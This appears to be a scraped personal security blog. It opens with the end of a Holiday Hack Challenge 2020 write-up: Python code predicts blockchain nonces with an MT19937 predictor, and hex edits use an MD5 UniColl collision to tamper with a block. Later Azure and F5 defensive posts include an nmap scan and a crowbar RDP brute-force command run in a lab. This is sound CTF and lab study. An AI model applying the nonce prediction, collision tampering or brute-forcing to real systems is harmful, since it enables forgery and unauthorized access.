        for d in self.data:
            s += (str('%02.02x' % d['type']).encode('utf-8'))
            s += (str('%08.08x' % d['length']).encode('utf-8'))
            s += d['data']
        s += (str('%02.02i' % (self.month)).encode('utf-8'))
        s += (str('%02.02i' % (self.day)).encode('utf-8'))
        s += (str('%02.02i' % (self.hour)).encode('utf-8'))
        s += (str('%02.02i' % (self.minute)).encode('utf-8'))
        s += (str('%02.02i' % (self.second)).encode('utf-8'))
        s += (str(self.previous_hash).encode('utf-8'))
        return(s)

    def block_data_signed(self):
        s = self.block_data()
        s += bytes(self.hash.encode('utf-8'))
        s += self.sig
        return(s)

    def load_a_block(self, fh):
        self.index = int(fh.read(16), 16)
        self.nonce = int(fh.read(16), 16)
        self.pid = int(fh.read(16), 16)
        self.rid = int(fh.read(16), 16)
        self.doc_count = int(fh.read(1), 10)
        self.score = int(fh.read(8), 16)
        self.sign = int(fh.read(1), 10)
        count = self.doc_count
        while(count > 0):
            l_data = {}
            l_data['type'] = int(fh.read(2),16)
            l_data['length'] = int(fh.read(8), 16)
            l_data['data'] = fh.read(l_data['length'])
            self.data.append(l_data)
            count -= 1
        self.month = int(fh.read(2))
        self.day = int(fh.read(2))
        self.hour = int(fh.read(2))
        self.minute = int(fh.read(2))
        self.second = int(fh.read(2))
        self.previous_hash = str(fh.read(32))[2:-1]
        self.hash = str(fh.read(32))[2:-1]
        self.sig = fh.read(344)
        return self

    def create_genesis_block(self):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes('Genesis Block'.encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 0
        block_data['rid'] = 0
        block_data['score'] = 0
        block_data['sign'] = Nice
        b = Block(0, block_data, genesis_block_fake_hash)
        return b

    def verify_types(self):  # check data types of all info in a block
        rv = True
        instances = [self.index, self.nonce, self.pid, self.rid, self.month, self.day, self.hour, self.minute, self.second, self.previous_hash, self.score, self.sign]
        types = [int, int, int, int, int, int, int, int, int, str, int, int]
        if not sum(map(lambda inst_, type_: isinstance(inst_, type_), instances, types)) == len(instances):
            rv = False
        for d in self.data:
            if not isinstance(d['type'], int):
                rv = False
            if not isinstance(d['length'], int):
                rv = False
            if not isinstance(d['data'], bytes):
                rv = False
        return rv

    def dump_doc(self, doc_no):
        filename = '%s.%s' % (str(self.index), data_extension[self.data[doc_no - 1]['type']])
        with open(filename, 'wb') as fh:
            d = self.data[doc_no - 1]['data']
            fh.write(d)
        print('Document dumped as: %s' % (filename))


class Chain():
    nonce_list = [] 
    index = 0
    initial_index = 0
    last_hash_value = ''
    def __init__(self, load=False, filename=None):
        if not load:
            self.blocks = [Block(genesis=True).create_genesis_block()]
            self.last_hash_value = self.blocks[0].full_hash()
        else:
            self.blocks = []
            self.load_chain(filename)
            self.index = self.blocks[-1].index
            self.initial_index = self.blocks[0].index

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def add_block(self, block_data):
        self.index += 1
        b = Block(self.index, block_data, self.last_hash_value)
        self.blocks.append(b)
        self.last_hash_value = b.full_hash() 

    def verify_chain(self, publickey, previous_hash=None):
        flag = True
        # unless we're explicitly told what the initial last hash should be, we assume that
        # the initial block will be the genesis block and will have a fixed previous_hash
        if previous_hash is None:
            previous_hash = genesis_block_fake_hash
        for i in range(0, len(self.blocks)):  # assume Genesis block integrity
            block_no = self.blocks[i].index
            if not self.blocks[i].verify_types():
                flag = False
                print(f'\n*** WARNING *** Wrong data type(s) at block {block_no}.')
            if self.blocks[i].index != i + self.initial_index:
                flag = False
                print(f'\n*** WARNING *** Wrong block index at what should be block {i + self.initial_index}: {block_no}.')
            if self.blocks[i].previous_hash != previous_hash:
                flag = False
                print(f'\n*** WARNING *** Wrong previous hash at block {block_no}.')
            hash_obj = MD5.new()
            hash_obj.update(self.blocks[i].block_data())
            signer = PKCS1_v1_5.new(publickey)
            if signer.verify(hash_obj, b64decode(self.blocks[i].sig)) is False:
                flag = False
                print(f'\n*** WARNING *** Bad signature at block {block_no}.')
            if flag == False:
                print(f'\n*** WARNING *** Blockchain invalid from block {block_no} onward.\n')
                return False
            previous_hash = self.blocks[i].full_hash()
        return True

    def save_a_block(self, index, filename=None):
        if filename is None:
            filename = 'block.dat'
        with open(filename, 'wb') as fh:
            fh.write(self.blocks[index].block_data_signed())

    def save_chain(self, filename=None):
        if filename is None:
            filname = 'blockchain.dat'
        with open(filename, 'wb') as fh:
            i = 0
            while(i < len(self.blocks)):
                fh.write(self.blocks[i].block_data_signed())
                i += 1

    def load_chain(self, filename=None):
        count = 0
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'rb') as fh:
            while(1):
                try:
                    self.blocks.append(Block(load=True).load_a_block(fh))
                    self.index = self.blocks[-1].index
                    count += 1
                except ValueError:
                    return count

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    for i in range(9):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes(('This is block %i of the naughty/nice blockchain.' % (i)).encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 123 # this is the pid, or "person id," that the block is about
        block_data['rid'] = 456 # this is the rid, or "reporter id," of the reporting elf
        block_data['score'] = 100 # this is the Naughty/Nice score of the report
        block_data['sign'] = Nice # this indicates whether the report is about naughty or nice behavior
        c1.add_block(block_data)
    print(c1.blocks[3])
    print('C1: Block chain verify: %s' % (c1.verify_chain(public_key)))

#Note: This is how you would load and verify a blockchain contained in a file called blockchain.dat
#
    with open('official_public.pem', 'rb') as fh:
        official_public_key = RSA.importKey(fh.read())
    c2 = Chain(load=True, filename='blockchain.dat')
    print('C2: Block chain verify: %s' % (c2.verify_chain(official_public_key)))
    print(c2.blocks[0])
    c2.blocks[0].dump_doc(1)


    predictor = MT19937Predictor()
    nonce_list= []
    # Adding all the nonces of all the blocks in a list
    for i in range(len(c2.blocks)):
         nonce_list.append(c2.blocks[i].nonce)
 
    # reeversing the list
    nonce_list.reverse()
    # get the first 625 nonces
    last_625_block_nonce = list(itertools.islice(nonce_list,625))
    # reverse the list so we get the last 625 nonces
    last_625_block_nonce.reverse()

   # Setting the data for 625 nonces to the MT19937Predictor
    for nonce in last_625_block_nonce:
        predictor.setrandbits(nonce, 64)

    # calcutated nonce and added for block 12997 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(13205885317093879758,64)
    # calculated nonce and added for block 12998 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(109892600914328301,64)
    # calculated nonce and added for block 12999 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(9533956617156166628,64)
    # Get the nonce for block 13000
    print(predictor.getrandbits(64))

Determine and extract the original naughty document:

Below is part of the 129459.pdf – Jack’s document (obviously a nice one!)

Nice document for Jack Frost

Open the file 129549.pdf in an online hex editor [https://hexed.it/] and make changes (See right side)
Ref: https://speakerdeck.com/ange/colltris?slide=194

PDF which Jack Frost had (left, the nice list) and the recovered PDF (right, the naughty list)

Save the changes as a different PDF file. Open and you see the different PDF – the naughty list, the original one meant for Jack Frost.

The naughty list for Jack Frost

Determine the flag for naughty/nice in the Jack’s block :

Open the Jack’s block file in online hex editor and compare the text version of the block to find the nice/naughty flag.
Jake must have changed this from 0 (original which means naughty) to 1 (nice).

The position of the naughty nice flag in the hex for the PDF

Determine 3rd and 4th byte which were changed by Jake :

At this point, we have two bytes identified – one for the PDF page number and another for nice/naughty flag.

The 3rd and 4th bytes identified

Following the Unicoll computation technique as noted in https://speakerdeck.com/ange/colltris?slide=109
The 1st byte – This is the nice/naughty flag we decreased by 1 (31 to 30)
The 2ndByte – This would be the 10th byte of the next block which we need to increase by 1 (D6 to D7)
The 3rd Byte – This is the PDF page number which we increased by 1 (32 to 33)
The 4th Byte – This would be the 10th byte of the next block which we need to decrease by 1 (1C to 1B)

Please see the screenshot below for the all changes:
left side is Jake’s block (block.dat)
right side is original block which Jake changed (block_restored.dat) – changes in bytes noted below.

Jack’s block (left) and original block restored which Jack changed (right)remember, the MD5 for both is still same!

Jake was able to change the original block without changing the hash. His block’s MD5 has was b10b4a6bd373b61f32f4fd3a0cdfbf84
We needed to undo his changes and restore the original block, without changing the MD5 hash.
As you can see with the below changes, the hashes still don’t change.

MD5 Hash of Jake’s block (block.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84

MD5 Hash of Jake’s block (block.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84

MD5 Hash of original block (block_restored.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84

MD5 Hash of original block which Jack modified (block_restored.dat) – b10b4a6bd373b61f32f4fd3a0cdfbf84

Now we just need to save the changes in a new file block_restored.dat and calculate the SHA256 hash of it.

 SHA256 of the block_restored.dat

fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

SHA256 of the restored block – fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

The below zip file contains the changed naughty_nice.py (please remove .txt after extraction)

All objectives are completed now

All narratives have been unlocked

The best part!

After completing all the objectives, you go to Santa’s office.
Tinsel Upatree says “Quickly go out to the balcony to be recognized”!!

You go the roof and and congratulations are in order!!!!

Jack’s plan is foiled!

The exclusive winner hoodie :

I got myself the exclusive Holiday Hack challenge 2020 winner hoodie!

, , , ,

2 Comments

Azure Policy – Deny creation of virtual machines without IP restriction across all Azure subscriptions

TLDR;

Public Azure virtual machines without any IP restriction is always an attack vector which may result in compromise of the VM and further lateral movement in Azure infrastructure.
Azure policy may be used to deny any attempt to even create the virtual machines without IP restriction.
This blog post has step-by-step process on how to implement an Azure policy on ALL your subscriptions covering IP restriction for ALL your future virtual machines.

What is Azure policy:

Azure policy is a service inside Azure that allows configuration management.It executes every time a new resource is added or an existing resource is changed. It has a set of rules, and set of actions. The Azure policy could report the event as non-compliant or even deny the action altogether if the rules are not matched.

Azure policy is an excellent way to enforce and bake-in security and compliance in the Azure infrastructure.
As you see in the below picture, Azure policy is an integral part of Azure Governance – mainly consisting of Policy Definitions and Policy Engine which works directly with Azure Resource Manager (ARM).

image 
Image source : https://www.microsoft.com/en-us/us-partner-blog/2019/07/24/azure-governance/

Summary:

If the Azure virtual machines need to be accessible over internet, Its important to restrict access its access ONLY from your corporate public IP addresses.
This will help in couple of situations :
a) Limit external access from an attacker.
b) Limit Insider threat or misuse from an employee.
The IP address restriction could be created while creating the virtual machine using network security groups.
However, enforcing this on the policy level by the administrator would ensure we are not dependent on individual team’s best judgment.

Process:

As a best practice, always test the policy in audit mode before switching to deny mode. In this walkthrough, we will follow below steps :

1) Create the policy definition.
2) Apply the policy (Policy Assignment) in audit mode
3) Test with Audit mode
3) Apply the policy (Policy Assignment) in deny mode
4) Test with Deny mode

Create the policy definition

On the search bar, search for “policy” and click on it.

image

Click Definitions and then click Policy Definitionimage

Click the … button under “Definition Location” to select the management group. If you want to apply this policy to all subscriptions, don’t select any subscription.
To apply this policy to a specific subscription, select the desired subscription under the subscription dropdown.

image

Policy Details:

Name:
Deny creation of virtual machine without access restricted only from company’s public IP addresses
(on-prem/VPN)

Description (Change the IP address list below):
Deny creation of virtual machine which does not have external company IP addresses restriction in the network security group.
One or more of the below corporate IP addresses must be specified in the network security group when creating the virtual machine. Otherwise, the validation will fail and the virtual machine will not be created.
Below is the valid public corporate IP addresses list :
208.114.51.253
104.104.51.253
108.104.51.253

Category : Network
image 
Policy Rule:

{
  "mode": "All",
  "policyRule": {
    "if": {
      "allOf": [
        {
          "field": "type",
          "equals": "Microsoft.Network/networkSecurityGroups"
        },
        {
          "count": {
            "field": "Microsoft.Network/networkSecurityGroups/securityRules[*]",
            "where": {
              "allOf": [
                {
                  "anyof": [
                    {
                      "field": "Microsoft.Network/networkSecurityGroups/securityRules[*].sourceAddressPrefix",
                      "notIn": [
                        "208.114.51.253",
                        "104.104.51.253",
                        "108.104.51.253"
                      ]
                    }
                  ]
                }
              ]
            }
          },
          "greater": 0
        }
      ]
    },
    "then": {
      "effect": "[parameters('effect')]"
    }
  },
  "parameters": {
    "effect": {
      "type": "String",
      "metadata": {
        "displayName": "Effect",
        "description": "The effect determines what happens when the policy rule is evaluated to match"
      },
      "allowedValues": [
        "audit",
        "deny"
      ],
      "defaultValue": "audit"
    }
  }
}

Policy Assignment

Under policy > definition, go to the newly created policy definition.
image

Click Assign.

image

Provide an assignment name and description
Name:
Deny creation of virtual machine without access restricted only from company’s public IP addresses
(on-prem/VPN)

Description (Change the IP address list below):
Deny creation of virtual machine which does not have external company IP addresses restriction in the network
security group.
One or more of the below corporate IP addresses must be specified in the network security group when creating the virtual machine. Otherwise, the validation will fail and the virtual machine will not be created.
Below is the valid public corporate IP addresses list :
208.114.51.253
104.104.51.253
108.104.51.253

image

Under “Parameters” tab, select “audit” in the Effect dropdown and click “Review+Create”

image

On the review page, click “Create” .

image

The policy assignment is created. Please note It takes about 30 minutes to take effect.

image

 

Test 1 – Audit mode :
Create virtual machine with RDP allowed from any external IP Address

With the policy in Audit mode, let us create a new virtual machine with RDP open to any external IP address.

image

image

image
When the policy is in the audit mode, the virtual machine creation is successful but Azure policy adds a Microsoft.Authorization/policies/audit/action operation to the activity log and marks the resource as non-compliant.

Activity Logsimage

Compliance State:
Policy > Compliance
image

Test 2 – Deny mode
Create virtual machine with RDP allowed from any external IP Address

We need to change the effect mode to “deny” in our policy assignment.
Head over to Policy > Assignments > Click on the policy we created

image
Click “Parameters” tab. Select “deny” from the dropdown and continue to save the policy assignment.

image

Attempt to create a virtual machine with the same settings as we did before.
image

When you proceed to create the virtual machine, the final validation will fail with an error message (left side) which when clicked will show which policy disallowed this action.

image

Clicking on the policy would show the policy assignment with details showing why the policy disallowed this action.

image

When the policy is in the deny mode, the virtual machine creation is successful but Azure policy adds a Microsoft.Authorization/policies/deny/action operation to the activity log and marks the resource as non-compliant.

Under activity logs, you can see the deny action.:
image

image

Summary :

Azure policy is an excellent way of enforcing compliance in Azure infrastructure. In this blog post we saw how we can apply Azure policy to deny creation of virtual machines without any IP restriction.
For further readings :
Azure policy docs : https://docs.microsoft.com/en-us/azure/governance/policy/overview
Azure policy Github : https://github.com/Azure/azure-policy

, , , ,

Leave a comment

Detection of identity-based risks using Azure AD Identity Protection and Graph API

Github repository : https://github.com/ashishmgupta/AzureADIdentityProtection

image

What is Azure AD Identity Protection?
Identity Protection is a tool in Azure AD that allows organizations to accomplish three key tasks:

  • Automate the detection and remediation of identity-based risks.
  • Investigate risks using data in the portal.
  • Export risk detection data to third-party utilities for further analysis.

Identity Protection identifies risks in the following classifications:

Risk Detection Type Description
Atypical travel Sign in from an atypical location based on the user’s recent sign-ins.
Anonymous IP address Sign in from an anonymous IP address (for example: Tor browser, anonymizer VPNs).
Unfamiliar sign-in properties Sign in with properties we‘ve not seen recently for the given user.
Malware linked IP address Sign in from a malware linked IP address
Leaked Credentials This risk detection indicates that the user’s valid credentials have been leaked
Azure AD threat intelligence Microsoft’s internal and external threat intelligence sources have identified a known attack pattern

Source :https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Note : Azure AD Identity Protection is fully available in the Azure AD Premium P2 only.

In this blog post, we will focus on detection of the above identity based risks.

There are two steps :
1) From Azure Portal, setup the Application (with a token) with configured permissions to read data from Identity Protection.
2) Python script to use Graph API with the above OAuth token to access the Identity protection data to ingest in your SIEM tool.

Setting up the application in the Azure portal
Azure Active Directory > App Registrations > New Registration

image

Give the application a name.

image

Add API permissions.
API Permission > Add a permission

image

Click Microsoft Graph

image

Since we want the logs from an application instead for a user, select Application permission.

image

Now, there are three API and we need specific permissions for them to access data via Graph API.

API Name Details Permission Needed
Sign Ins Allows query Graph API for information on Azure AD sign-ins with specific properties related to risk state, details and level AuditLog.ReadAll
Directory.ReadAll
Risky Users Gets users identified by identity protection as risky users. IdentityRiskyUser.ReadAll
Risk Detections Gets both risky users and sign-in linked risk detections and associated information identityRiskEvents.ReadAll

Above API permissions need to be set under Microsoft Graph as shown below.

image image
image image

The Global Administrator of your tenant needs to grant admin consent for the permissions you added.
You should contact them for this and get the consent granted.

image

Create a new client secret.

Certificate and Secrets > New Client Secret

image

image

A secret is automatically generated and can be copied.

image

Python script to use Graph API to pull Identity Protection data
Below is the screenshot of of a section of the python code which uses the ClientId, Client Secret and the tenant domain to get the OAuth token and then uses the OAuth token to query the Microsoft Graph API to get the identity protection data in the JSON format for both risky users and risky detection.

Full source code is located here :
https://github.com/ashishmgupta/AzureADIdentityProtection

The code also retries in case of the number of requests crosses the threshold (HTTP 429 Too many requests).

image

Hope this post helps you implementing and querying the Azure Identity Protection data in your organization.
Please feel free to ask questions in the comments sections below.

, , ,

Leave a comment

Azure Sentinel – Detecting brute force RDP attempts

Azure Sentinel is a cloud based SIEM* and SOAR** solution.
As it’s still in preview, I wanted to test out few of Its capabilities.
In this post we will see how we can detect RDP brute-force attempts and respond using automated playbooks in Azure Sentinel.
[*SIEM : Security Incident Event Management]
[**SOAR : Security Orchestration Automated Response]

image
https://docs.microsoft.com/en-us/azure/sentinel/overview

The infrastructure:

I have couple of virtual machines in Azure which have RDP opened (sure, I am the first one to keep that opened) 🙂 Below is one of the Win 2012 machine.

image

The Attack:

Attackers always the scan the whole CIDR to find the services running on the machines in the range. In this example, simulating the scan, I will use only one machine ( the above one) from the Kali VM looking if the RDP (port 3389) is opened.

nmap -p 3389 IPAddress –Pn

image

For brute-force, we will use crowbar.
Clone the repository:
git clone https://github.com/galkan/crowbar.git
image

I have separate files for usernames(userlist) and passwords(passwordlist) which will be used by Crowbar in combination to attempt to login to the above machine via RDP.

python crowbar.py -b rdp -s ipaddress -U userlist -C passwordlist –v
-b indicates target service. In this case Its rdp but crowbar also supports openvpn, sskkey and vnckey.
-v indicates verbose output

You see the combination which has “RDP-SUCCESS” is the right combination of user name and password which was brute-forced for successful login via RDP. Other attempts failed. Of course, I have the right user name and password in the file. 🙂
 
image

Azure Sentinel

Now lets get to Azure Sentinel. As noted above, Its a cloud based SIEM.
You can quickly locate “Azure Sentinel” from the search bar.
image

Sentinel manages all Its data in a log analytics workspace. If you already have one, you can reuse or create a new one.

image

One of the first thing you notice in Azure Sentinel is a number of in-built Data Connectors available to collect data from different sources. Not only that includes Azure native data sources such as Azure AD, Office 365, Security center to name a few but also third parties like Palo Alto, Cisco ASA, Checkpoint, Fortinet and F5.
Pretty sure the list will only get longer.

For the purpose of this blog post, we will focus on the “Security Events” by clicking on “Configure”.

image

Select “All events”.
Click on “Download install Agent for Windows Virtual machines”.
Select the Virtual machine where the agent will be installed.
Click “Connect”.
The “Connect” process takes few minutes to complete.

image

image

image

When the machine is shows “Connected” in Azure portal, you will see the Microsoft Monitoring Agent (MMA) service running on the machine which will upload the logs to the Azure sentinel workspace for the subscription.

image

Start writing some queries

Azure Sentinel uses Kusto Query Language for read-only requests to process data and return results.
In the sentinel workspace, click on “Logs” and use the below query which is basically looking for security events with successful login event (EventId 4624) and unsuccessful login event (EventId 4625) originating from a workstation named “kali”.
Note the highlighted event was the only successful attempt(EventId 4624) and rest were failures (4525).

SecurityEvent
| where (EventID == 4625 or EventID== 4624) and WorkstationName == “kali”
| project TimeGenerated, EventID , WorkstationName,Computer, Account , LogonTypeName , IpAddress
| order by TimeGenerated desc

image

image

Creating Alerts

Create an alert for the above use case by clicking “Analytics” > Add

image

Give a name to the alert, provide a description. and set the severity.

image

Set the alert query to detect any RDP login failure:

SecurityEvent
| where EventID == 4625
| project TimeGenerated, WorkstationName,Computer, Account , LogonTypeName , IpAddress
| order by TimeGenerated desc

image

Set the entity mapping. These properties will be populated from the projected fields in the query above.
Will be very useful information when we build playbooks. As you can see, there are only three properties which could be mapped at this point but more to come.

In this example, Account Name used for the attempted login, the host where It is being tried on and the workstation where It is tried from will be populated.

image

Playbook

Playbooks in Azure Sentinel are basically Logic apps which is really powerful not only because of the inbuilt templates but also because they can be heavily customized.

image

Sorry, I just wanted to remind myself again and you, dear reader that logic apps are really powerful. 🙂

image

Create the logic app:

image

In the designer, click on “Blank Logic App”

image

We first need to define the trigger. In this case It would be when the response to an alert is triggered in Azure Sentinel.
Search “Sentinel” in the textbox and you will find the trigger. Click on the trigger and the trigger will be added as a first step.

image

We will send an email to respective team (e.g. Security Operations) when this event happens. In this case I am sending the email to my Office 365 email address.

image

You will need an Office 365 tenant(sign up for free trial here) to send email.
In the below example, I already one and connected. If I didn’t, all I had to do is to sign-in with my admin office-365 account and connection would be available to send emails.

As you click through the subject and body, you will be prompted to select the Dynamic contents which will have relevant data in this case.

image

image

Cases

When an alert fires, I creates a case and you can execute the relevant playbook for the case.
In this example, we have a alert configured named “rdp-bruce-force attempt-alert”.
Every time that alert fires, I will create a new case with the same name as the alert with a case Id.
We can then execute the relevant playbook on the case. In this example, we will execute the playbook we created before “rdp-bruce-force attempt-alert-playbook”.

In the Sentinel workspace, click on “Cases” to review all the cases and click on the case which got created for the brute-force attempt.

image

At the bottom the details pane of the case, click on the “View full details”.image

Click “View Playbooks”

image

Click on “Run” for the playbook we want to execute.

image

Below is the email as a part of the playbook I got with the account names in the security event logs.

image

Hope this helps! 🙂

, ,

1 Comment

Identify Critical Assets in your environment using F5 Load balancer

Identifying the servers hosting critical applications in your environment is crucial so that alerts for unusual events on those servers are put on higher priority for your security operations team.

One of the approaches we can take to identify the critical assets is by leveraging the load balancer. This could be a head start to build a mini-CMDB (Configuration Management Database) for assets for your sec ops team.

Below is an over-simplified example of network architecture showing a critical web app named “example.com” web app hosted by 5 servers which are load balanced on F5 (VIP : 172.22.23.11). Out of the 5 servers, only 3 servers are active.

In this example, the goal is to get the active servers behind the VIP.

image

I wrote a PowerShell script to get all the active servers behind all the active VIPs on the a given load balancer.

Why this approach?

  1. If the server is hosting an app which is critical, It has to be load balanced.
  2. If a new server is added to an existing VIP, this script will get it.
  3. If a server is decommissioned, It would be inactive to the load balancer and therefore the script will ignore it.

If the script is scheduled to run periodically, we will have an up-to-date list of servers which are running critical applications. That list can be integrated with SIEM to prioritize alerts from the those servers.

The script 

The PowerShell script makes use of PowerShell cmdlet for F5 which can be downloaded from the below location.
https://devcentral.f5.com/d/microsoft-powershell-with-icontrol?download=true
The downloaded file is a .zip file. You copy to your local folder, unzip it and run .\setupSnapin.ps1 which is unzipped file. You may get an error :

Could not load file or assembly iControlSnapin.dll or one of its dependencies. Operation is not supported. (Exception from HRESULT: 0x8013515
image

Make sure the “Unblock” is checked from all the files in the unzipped file including “setupSnapin.ps1”

image

.\setupSnapin.ps1 should work fine now.

image

Below is the script. You will need to change the F5 IP address and the partition name where the virtual servers reside. The output of the script is saved to a file named “ServerList.csv”

Add-PSSnapIn iControlSnapIn

function GetPoolMembers($poolname,$virtual_server_name_only,$virtual_ip)
{

	$poolmembers = $ic.LocalLBPool.get_member_v2(@($poolname))
	
	$test = $poolmembers[0]
	write-output($poolname)
	write-output ('Backend servers and ports :')
	$member_status = $ic.LocalLBPool.get_member_object_status($poolname,$poolmembers)
	
	$node_index = 0
	foreach($poolmember in $test)
	{
		$availability_status = $member_status[0][$node_index].availability_status
		if($availability_status -eq "AVAILABILITY_STATUS_GREEN")
		{
			$ip_address = $poolmember[0].address.replace($active_folder,"").replace("/","")
			write-output($ip_address )
			$global:server_node_details += $ip_address+","+$virtual_server_name_only + "," + $virtual_ip +"`n"
			write-output($global:server_node_details)
			
		}
		$node_index = $node_index + 1
	}
	
	write-output $global:server_node_details
}

$global:server_node_details = "sep=,"+"`n"
$global:server_node_details += "Server IP,F5 Virtual IP,F5 Virtual Server Name" +"`n"

$connection = Initialize-F5.iControl -Hostname <Your F5 IP Address> -Credentials (Get-Credential)
$ic = Get-F5.iControl


# Set the active folder aka partitions where you know the virtul servers exist
$active_folder = "/YourPartitionName/"
$ic.SystemSession.set_active_folder($active_folder)

# get list of all the virtual servers 
$virtual_server_list = $ic.LocalLBVirtualServer.get_list()
$virtual_server_with_server_side_profile = @()
foreach($virtualserver in $virtual_server_list)
{
	
	$object_status = $ic.LocalLBVirtualServer.get_object_status($virtualserver).availability_status
	
	if($object_status -eq "AVAILABILITY_STATUS_GREEN")
	{
		$virtual_server_name_only = $virtualserver.replace($active_folder,"")
		write-output ('Virtual server name ' + $virtualserver)
		write-output ($object_status)
		$addresses = $ic.LocalLBVirtualServer.get_destination_v2($virtualserver)
		write-output($addresses.Length)
		$virtual_ip = $addresses[0].address.replace($active_folder,"")
		write-output('Virtual IP address : ' + $virtual_ip )
		$pool_name = $ic.LocalLBVirtualServer.get_default_pool_name($virtualserver)
		GetPoolMembers $pool_name $virtual_ip $virtual_server_name_only
	}
	
}

$global:server_node_details | Out-File -FilePath .\ServerList.csv

The output
The script output has 3 columns for each server in with Its Virtual IP and Virtual server name.
Virtual server name is an identifier for the Virtual IP address on the load balancer. That name provides an indication of what that server is used for. This approach groups servers by their Virtual server name and saves identifying each server for what it is used for.

In the below hypothetical example for the output, servers 172.22.1.1, 172.22.1.2 and 172.22.1.3 running example.com web app.

image

, , ,

Leave a comment

Random Thoughts

The World as I see it

Simple Programmer

Making The Complex Simple

Ionic Solutions

Random thoughts on software construction, design patterns and optimization.

Long (Way) Off

A tragic's view from the cricket hinterlands